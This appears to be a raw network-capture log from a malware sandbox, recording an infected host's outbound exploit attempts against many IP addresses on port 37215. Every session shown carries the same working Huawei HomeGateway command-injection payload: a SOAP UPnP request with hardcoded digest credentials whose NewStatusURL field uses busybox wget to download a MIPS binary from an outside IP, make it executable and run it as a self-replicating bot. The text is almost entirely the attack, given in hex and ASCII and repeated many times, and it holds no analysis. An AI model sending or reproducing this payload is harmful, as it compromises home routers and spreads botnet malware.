20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1684192.168.2.134838641.171.225.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535476923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1685192.168.2.1345884111.230.50.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535504103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1686192.168.2.1339604157.186.205.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535526991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1687192.168.2.1345222157.227.97.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535532951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1688192.168.2.1345428157.199.2.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535532951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1689192.168.2.1339634157.135.52.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535545111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1690192.168.2.1353082170.213.42.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535546064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1691192.168.2.1339150157.241.47.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535619974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1692192.168.2.1344840157.10.88.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535619974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1693192.168.2.1333120197.234.66.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535758972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1694192.168.2.1344064197.13.116.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535758972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
